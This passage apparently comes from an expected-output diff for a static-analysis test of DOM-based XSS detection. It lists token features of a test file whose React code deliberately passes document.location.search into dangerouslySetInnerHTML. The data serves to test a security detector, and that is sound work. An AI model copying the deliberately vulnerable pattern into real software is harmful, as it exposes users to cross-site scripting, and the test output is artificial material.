ainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:57 | __html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:57 | __html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:57 | __html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:57 | __html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:57 | __html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:52:251:82 | __html: ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:63 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:63 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:63 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:63 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:63 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:69 | this.state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:69 | this.state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:69 | this.state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:69 | this.state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:60:251:69 | this.state | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | contextSurroundingFunctionParameters | ()\n() | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:251:60:251:82 | this.st ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:65:251:69 | state | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:65:251:69 | state | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:65:251:69 | state | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:65:251:69 | state | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:65:251:69 | state | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:251:71:251:82 | stateTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:251:71:251:82 | stateTainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:251:71:251:82 | stateTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:251:71:251:82 | stateTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:251:71:251:82 | stateTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:5:255:33 | () | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:5:255:33 | () | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:255:5:255:33 | () | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:5:255:33 | () | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:5:255:33 | () | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:6:255:32 | | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:6:255:32 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:255:6:255:32 | | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:6:255:32 | | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:6:255:32 | | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:7:255:8 | C3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:7:255:8 | C3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:255:7:255:8 | C3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:7:255:8 | C3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:7:255:8 | C3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:20 | propTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:20 | propTainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:20 | propTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:20 | propTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:20 | propTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:10:255:30 | propTai ... ainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | assignedToPropName | propTainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:255:23:255:29 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:258:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 